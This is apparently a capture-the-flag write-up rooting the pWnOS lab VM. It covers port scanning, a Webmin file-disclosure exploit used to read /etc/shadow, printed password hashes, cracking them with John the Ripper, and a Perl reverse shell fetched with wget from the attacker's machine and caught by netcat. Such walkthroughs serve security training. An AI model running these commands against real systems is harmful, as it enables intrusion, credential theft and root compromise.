- VM: pWnOS
- Goal: acquire root access
- Approach: solve without automated exploitation tools
Network IP address fix for VMware
If the VM does not obtain an IP address automatically. do the following to fix it:
- Reset the root password
- login to Holynix as root
- run command: rm /etc/udev/rules.d/70-persistent-net.rules
- reboot Holynix: shutdown -r 0
After doing this, the VM should obtain an IP address correctly. Note: if you like to maintain the original root password, record the root entry in /etc/shadow file right before changing the root password and then place it back after the procedue is completed.
Enumeration
Target Discovery
First locate the IP address of my target:
nmap -n -sn 192.168.172.200-

Port scanning
nmap -p- -A 192.168.172.214

TCP: 22 | OpenSSH 4.6p1 Debian 5build1 |
TCP: 80 | Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) |
TCP: 139 | Samba smbd 3.X – 4.X (workgroup: MSHOME) |
TCP: 445 | Samba smbd 3.0.26a (workgroup: MSHOME) |
TCP: 10000 | MiniServ 0.01 (Webmin httpd) |
Check out the website

There isn’t much on the website. Following the Next button and fill in some info would just receive some taunting. lol


Check out Webmin site

The webpage shows a login form to login to Webmin. I try some SQL injection test and it’s not vulnerable. So I turn to searchsploit to check for any vulnerability to Webmin.
searchsploit webmin

There is a Arbitrary File Disclosure exploit that maybe helpful. I am trying out the 1997.php
Exploitation
Webmin: Arbitrary File Disclosure
cp /usr/share/exploitdb/exploits/multiple/remote/1997.php . php -f 1997.php 192.168.172.214 10000 http /etc/passwd

Awesome. I am able to retrieve the file /etc/passwd. Then I try to retrieve /etc/shadow and it’s also successful and obtain the following password hashes:
root:$1$y6hGTk5a$1TpAFWhHwn44JOTsIANpk1:18164:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7::
:obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
Password cracking
Let’s crack the password using john the ripper:
Step 1: Combine passwd & shadow
I save the passwd & shadow files to pwnos-passwd & pwnos-shadow respectively and use the unshadow command to combine both passwd & shadow file:
unshadow pwnos-passwd pwnos-shadow > pwnos-hash
Step 2: Now perform dictionary attack using john the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt pwnos-hash

We crack the password for user vmware: h4ckm3. We can now login using ssh.
SSH Login
ssh -l vmware 192.168.172.214

Privilege Escalation
webwin is using perl script running as .cgi extension. The webmin exploit that we used was exploiting the LFI (Local File Inclusion) vulnerability. Typically, when retrieving the same script extension (in this case .cgi) from the webserver, the script will be executed and returns the result instead of the actual content of the script.
So we can upload a perl reverse shell script and use this webmin exploit again to try execute the reverse shell. First get a copy of perl reverse shell, update ip address & port (192.168.172.110:4000) and setup a webserver at kali box:
cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi nano rshell.cgi python -m SimpleHTTPServer 80
Then download the cgi file to target machine:
cd /tmp wget http://192.168.172.110/rshell.cgi chmod 755 rshell.cgi
Setup a Netcat listener at kali box:
nc -lp 4000
Finally on another kali terminal:
php -f 1997.php 192.168.172.214 10000 http /tmp/rshell.cgi

Root access obtained!